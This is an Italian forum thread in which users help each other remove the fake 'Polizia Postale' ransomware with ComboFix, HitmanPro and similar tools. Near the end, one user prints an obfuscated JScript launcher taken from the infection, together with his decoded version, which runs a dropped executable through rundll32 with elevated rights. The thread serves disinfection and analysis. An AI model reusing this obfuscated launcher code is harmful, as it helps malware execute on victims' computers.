virus polizia postale senza modalità provvisoria

[Liku Fanele]

Ciao, son qui che ti leggo però non essendo un utente esperto di PC (anzi, tutt'altro) sto valutando la tua prima risposta (perché già la seconda è un po' più impegnativa...) però leggo che combofix non guarda in faccia a nessuno.

In altri termini ho letto che è un ultima spiaggia solamente per utenti esperti...

[FiorDiLatte]

Se è il pc di casa, che lo usi solo Tu vai tranquillo, non fa del male, più di quello che già fa il tuo antivirus.

bye

[Liku Fanele]

Vabbè, allora vado...

Ci sentiamo fra un po'...

P.S. Eccomi con subito due intoppi:

1) malgrado abbia disabilitato avira (che ha adesso l'ombrellino chiuso...) combofix dice che trova lo scanner attivo e se continua può arrecare danni al PC;

2) non ho capito bene ma dice che vuole scaricare dei CD di Windows per il punto di ripristino...

3) ho ovviamente stoppato tutto la procedura

[FiorDiLatte]

Quote:

Originariamente inviato da Liku Fanele

Vabbè, allora vado...

Ci sentiamo fra un po'...

P.S. Eccomi con subito due intoppi:

1) malgrado abbia disabilitato avira (che ha adesso l'ombrellino chiuso...) combofix dice che trova lo scanner attivo e se continua può arrecare danni al PC;

2) non ho capito bene ma dice che vuole scaricare dei CD di Windows per il punto di ripristino...

3) ho ovviamente stoppato tutto la procedura

1) Se nell'Avira l'ombrellino è chiuso, fai cmq la scansione, non c'è problema.

2) Chiede di installare la Console di Ripristino, puoi anche installarla con XP male non fa, altrimenti gli dici di no.

3) Vai tranquillo, al massimo prende fuoco il pc.


bye

[Liku Fanele]

Quote:

Originariamente inviato da FiorDiLatte

1) Se nell'Avira l'ombrellino è chiuso, fai cmq la scansione, non c'è problema.

2) Chiede di installare la Console di Ripristino, puoi anche installarla con XP male non fa, altrimenti gli dici di no.

3) Vai tranquillo, al massimo prende fuoco il pc.


bye

Avete visto colonne di fumo in giro? Bene, perché il mio PC non ha preso fuoco

Per adesso il problema è risolto: bravi

Grazie, a presto

[orione67]

Quote:

Originariamente inviato da FiorDiLatte

ps= gradirei conoscere la Vostra esperienza su questo malware.

Beccato ieri sera navigando con Firefox (in versione beta, la 19.0a2 di Aurora) sul mio vecchio portatile Toshiba con WinXp e AVGfree 2013... Terribile esperienza poichè in più di dieci anni di attività con i pc windows era la prima volta che prendevo un virus così potente, in maniera subdola ed inaspettata tale da bloccare qualsiasi intervento, anche in modalità provvisoria. La cosa strana è che non ho frequentato alcun sito piccante nè sono andato su siti alla ricerca di software piratato dove notoriamente è possibile prendere virus... la famigerata schermata della pseudo polizia postale mi è apparsa all'improvviso, dopo esser sparito per qualche istante il desktop...
Già rassegnato all'idea di dover formattare, fortunatamente avevo un'altro pc e con una breve ricerca su internet mi sono affidato alla soluzione offerta dal ComboFix... Alla fine, portatile disinfettato e qualche ora di sonno perse...

[max60]

Mi autoquoto al post di Orione: la stessa cosa è successa a me ieri sera.
Stavo navigando con Firefox su siti assolutamente tranquilli (cercavo recensioni di un certo modello di gomme invernali), a un certo punto è sparito il dekstop, per una frazione di secondo ho visto MSE che cercava di dire qualcosa, ma poi è apparsa a tutto schermo la videata con l'avviso della polizia di stato (e relativa richiesta di 100 € per la sistemazione).
La stessa cosa succedeva anche in modalità provvisoria, per cui non ho potuto adottare alcuni interventi consigliati su Internet.

Allora sono partito con un liveCD e ho cancellato manualmente dalla cartella documenti un eseguibile sicuramente maligno, e da esecuzione automatica il link a questo eseguible.
A quel punto il pc si è finalmente avviato, e ho fatto una passatona con MalwareBytes che ha trovato altri 3 elementi nocivi e li ha messi in quarantena.
Ora mi chiedo: devo fare altro (es. Combofix) ?

Cosa fa esattamente questo virus ?
Ho sentito dire che può anche crittografare i files, rendendoli inutilizzabili.

Ho letto in rete che anche gente con Avast e Avira ultimamente si è beccato questo virus.
Vorrei levare al più presto MSE che ieri sera mi ha profondamente deluso, ma con cosa lo sostituisco ?

[nV 25]

Quote:

Originariamente inviato da nV 25

chi ha difficoltà a rimuovere il malware in questione con HitmanPro, provi quantomeno a vedere se la modalità "forzata" riesce a sortire qualche effetto.

Qui potete vedere anche il filmato http://hitmanpro.wordpress.com/2010/...ce-breach-mode.
Se non erro, cmq, da modalità amministratore è sufficiente tener premuto il tasto CTRL di sinistra mentre si lancia appunto HitmanPro.

sempre in relazione ad HitmanPro, segnalo che è stata introdotta un'ulteriore tecnologia (Kickstart) pensata tra l'altro per avere ragione anche dei virus oggetto di questo thread (ramsomware, "riscatto").

Questa tecnologia prevede la creazione di un'apposita unità USB con cui effettuare il boot automatizzando di conseguenza tutto il processo di rimozione.

Video che mostra come creare l'unità USB

Video che mostra come utilizzarlo

Se vi può servire, l'uso è davvero banale...

NB: compatibile da XP a 7

[max60]

Ieri sera ho cantato vittoria troppo presto.
Malwarebytes ha si eliminato un po' di roba, in particolare quella finestra del "ricatto" che impediva qualsiasi attività, ma poi usando un po' il pc questo era enormemente rallentato, Hijackthis si bloccava a 3/4 della scansione e rimaneva impallato, cliccando con il dx sul desktop usciva il menù contestuale dopo quasi 2 minuti d'orologio, Windows segnalava la mancanza di antivirus e firewall anche se presenti, ecc. ecc.
Allora ho provato Combofix e questo dopo circa mezz'ora di lavoro mi ha eliminato un po' di roba.
Vedo nel log che però ha trovato fra i files creati recentemente, anche questo:

2013-01-09 22:16 . 2013-01-10 05:51 3032 ----a-w- c:\documents and settings\All Users\Dati applicazioni\dsgsdgdsgdsgw.js

Non mi piace tanto quel nome, non vorrà dire che qualcosa è rimasto ancora ?
Adesso dopo la passata con Combofix il pc è molto più reattivo, ma sarà davvero finita ?
Se postassi il log di Combofix, qualcuno me lo potrebbe controllare ?
Grazie.

[FiorDiLatte]

Postalo.

bye

[pindol]

salve ragazzi,

un mio amico ha preso questo virus e ora tocca a me sistemare le rogne, sono riuscito in un modo o nell'altro a debellarlo, anche se non del tutto, ho cambiato cartella al file wdsgdgsdsgdsg.exe e ora ovviamente all'autoavvio non lo trova più e quindi non parte.

poi ho fatto una scansione con avira e me lo rileva giustamente come minaccia e lo ho fatto mettere in quarantena assieme a altri 3-4 file che ha trovato.

il problema dove sta ora?

semplice il pc impiega tipo 30 minuti per accendersi e non mi capacito del motivo, che può essere?

Pindol

[ferrorules]

Qualche servizio ancora attivo.. quindi ti consiglio di usare combofix, malwarebyte, virit e un bel ccleaner per pulire i temporanei; fatto questo il pc dovrebbe ritornare a riprendersi :-)

Inviato dal mio GT-I9300 con Tapatalk 2

[max60]

Quote:

Originariamente inviato da FiorDiLatte

Postalo.

Eccolo: logCombofix.txt
Grazie

Quote:

Originariamente inviato da pindol

salve ragazzi,
il pc impiega tipo 30 minuti per accendersi e non mi capacito del motivo, che può essere?

Prova anche tu Combofix, per me è stato risolutivo.
Non avere fretta, fallo lavorare finche si riavvia il sistema e prosegue con le sue attività.

[FiorDiLatte]

Ciao,

questo va cancellato (magari anche con "autoruns" se li rileva o il GMER):

c:\documents and settings\All Users\Dati applicazioni\dsgsdgdsgdsgw.js

Consiglio l'installazione di un firewall software come l'OnlineArmor che dovrebbe ribloccare il malware in questione.

bye

[mario.trifuoggi]

Salve a tutti,
avevo aperto l'altro ieri il thread seguente riguardante una variante di questo virus:

http://www.hwupgrade.it/forum/showthread.php?t=2538472

E' stato chiuso suggerendomi di venire qui; tuttavia avevo già letto per intero questo thread e, se ne avevo aperto un altro, è a causa di una anomalia che non riscontro in un nessun altro caso citato.

Come potete leggere, non ho avuto problemi a debellare il virus; tuttavia la maggior parte dei miei file (compresi quelli contenuti in una memoria esterna) sono diventati illeggibili. E non intendo criptati, ma proprio illeggibili: infatti non hanno cambiato estensione, nome o dimensione. Inoltre tutti i decrypter citati non hanno sortito effetto..

Nessun recupero è stato possibile nemmeno con svariati software di recupero.

Volevo sapere se avevate esperienza di altri casi simili o suggerimenti per "riparare" file.
Grazie

[il divino]

mi sono beccat o2 volte in un meso questa bestiaccia . . . e non ho nemmeno capito come. . . .

Comunque dato che mi funge solo la provvisoria con prompt ho usato combofix e in 5 min ho risolto tutto.

Al seconndo giro, brutta sorpresa, mi appare un messaggio tipo:

La data é 30-01-2013, la versione di comboxif é scaduta, cancellare e scaricare una nuova versione.

E logicamente sul sito il download non é temporaneamente disponibile.

Chiedo disperatamente aiuto per debellare il virus e consigli per prevenire nuove infezioni

attualmentemi difendo con Avira e Malawarebyte.

[max60]

E' vero, Combofix non risulta scaricabile al momento.
Una domanda stupida: hai provato magari da Bios a retrocedere un po' la data del sistema ?

Ho letto cmq che anche HitmanPro dovrebbe risolvere, lo hai provato ?

[orione67]

Quote:

Originariamente inviato da max60

Una domanda stupida: hai provato magari da Bios a retrocedere un po' la data del sistema ?

Perchè stupida?... Sicuramente è la soluzione giusta per far funzionare in emergenza qualsiasi software "scaduto", non ci vuole molto per arrivarci...

P.s. Io avevo beccato questo virus qualche settimana fa, risolto positivamente con il combofix. Ieri però ho fatto una scansione completa con l'AVG e mi ha trovato ancora qualche traccia in c:\documents and settings\All Users\Dati applicazioni\dsgsdgdsgdsgw.js, spostato in quarantena e poi definitivamente eliminato... Spero adesso che l'AVG riconosca questo virus prima di far nuovamente danni...

[il divino]

sono riuscito a riavviare!

sto scansionando, ma dato che non prendevo virus da anni e questo in 15 gg mi ha fregato 2 volte, non sto tanto tranquillo.


ho win7 e uso internet explorer

Come difese ho avira e malawarebyte

Il firewall di windows mi dice che o é disattivato o non impostato correttamente.. .

cosa dovrei fare per pararmi il . . . .

Grazie!

[max60]

Quote:

Originariamente inviato da orione67

Perchè stupida?... Sicuramente è la soluzione giusta per far funzionare in emergenza qualsiasi software "scaduto", non ci vuole molto per arrivarci...

Beh non è proprio così scontato che per bypassare il periodo di validità di un software, sia sufficiente portare indietro la data del computer.
Se fosse così le trial anche di software costosi avrebbero vita infinita ...

Quote:

Originariamente inviato da orione67

P.s. Io avevo beccato questo virus qualche settimana fa, risolto positivamente con il combofix. Ieri però ho fatto una scansione completa con l'AVG e mi ha trovato ancora qualche traccia in c:\documents and settings\All Users\Dati applicazioni\dsgsdgdsgdsgw.js, spostato in quarantena e poi definitivamente eliminato... Spero adesso che l'AVG riconosca questo virus prima di far nuovamente danni...

Anch'io avevo quel file dsgsdgdsgdsgw.js sul pc, è buono che AVG te l'abbia riconosciuto come pericoloso e te l'ha spostato in quarantena.
Nel mio caso (allora avevo MSE), l'antivirus di Microsoft non se n'era neanche accorto.
Me l'ha trovato Combofix e l'ho tolto dalla cartella documenti.
Comunque l'ho salvato e l'ho aperto con blocco note, tanto è un javascript.
E' interessante quello che c'è dentro.
Il contenuto è questo:

Codice:

var w = String.fromCharCode(83)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(108)+String.fromCharCode(108)+String.fromCharCode(46)+String.fromCharCode(65)+String.fromCharCode(112)+String.fromCharCode(112)+String.fromCharCode(108)+String.fromCharCode(105)+String.fromCharCode(99)+String.fromCharCode(97)+String.fromCharCode(116)+String.fromCharCode(105)+String.fromCharCode(111)+String.fromCharCode(110);
var a = String.fromCharCode(67)+String.fromCharCode(58)+String.fromCharCode(92)+String.fromCharCode(92)+String.fromCharCode(87)+String.fromCharCode(73)+String.fromCharCode(78)+String.fromCharCode(68)+String.fromCharCode(79)+String.fromCharCode(87)+String.fromCharCode(83)+String.fromCharCode(92)+String.fromCharCode(92)+String.fromCharCode(115)+String.fromCharCode(121)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(109)+String.fromCharCode(51)+String.fromCharCode(50)+String.fromCharCode(92)+String.fromCharCode(92)+String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(110)+String.fromCharCode(100)+String.fromCharCode(108)+String.fromCharCode(108)+String.fromCharCode(51)+String.fromCharCode(50)+String.fromCharCode(46)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(101)+String.fromCharCode(32);
var s = String.fromCharCode(99)+String.fromCharCode(58)+String.fromCharCode(92)+String.fromCharCode(100)+String.fromCharCode(111)+String.fromCharCode(99)+String.fromCharCode(117)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(126)+String.fromCharCode(49)+String.fromCharCode(92)+String.fromCharCode(103)+String.fromCharCode(105)+String.fromCharCode(111)+String.fromCharCode(109)+String.fromCharCode(97)+String.fromCharCode(120)+String.fromCharCode(126)+String.fromCharCode(49)+String.fromCharCode(92)+String.fromCharCode(119)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(100)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(100)+String.fromCharCode(103)+String.fromCharCode(100)+String.fromCharCode(115)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(100)+String.fromCharCode(46)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(101)+String.fromCharCode(32)+String.fromCharCode(44)+String.fromCharCode(72)+String.fromCharCode(49)+String.fromCharCode(78)+String.fromCharCode(51);
var m = String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(110)+String.fromCharCode(97)+String.fromCharCode(115);
var activex = new ActiveXObject(w);
activex.ShellExecute(a,s,"",m,1);
WScript.Sleep(2000);
var r = String.fromCharCode(87)+String.fromCharCode(83)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(46)+String.fromCharCode(83)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(108)+String.fromCharCode(108);
var WSHShell = WScript.CreateObject(r);
WSHShell.Run(a+s);

all'apparenza non si capisce una mazza, visto che compone il codice usando la codifica chr dei caratteri.
Ma incorporando il codice in una pagina html e facendo il document.write delle variabili che usa, la cosa assume un significato più chiaro e il codice diventa questo:

Codice:

var w = Shell.Application;
var a = C:\\WINDOWS\\system32\\rundll32.exe;
var s = c:\docume~1\giomax~1\wgsdgsdgdsgsd.exe ,H1N3;
var m = runas;
var activex = new ActiveXObject(w);
activex.ShellExecute(a,s,"",m,1);
WScript.Sleep(2000);
var r = WScript.Shell;
var WSHShell = WScript.CreateObject(r);
WSHShell.Run(a+s);

In pratica utilizza la shell di windows per eseguire il programma wgsdgsdgdsgsd.exe che era stato messo all'interno della cartella documenti.
Il tutto credo che venisse attivato da un collegamento presente in esecuzione automatica.
Quello l'ho proprio cancellato e non me lo sono salvato.

Quote:

Originariamente inviato da il divino

Come difese ho avira e malawarebyte
Il firewall di windows mi dice che o é disattivato o non impostato correttamente.. .

Non è un buon segno se il firewall ti risulta disattivato.
magari hai ancora qualche porcata in giro.
Provato HitmanPro se ti scova qualcosa ?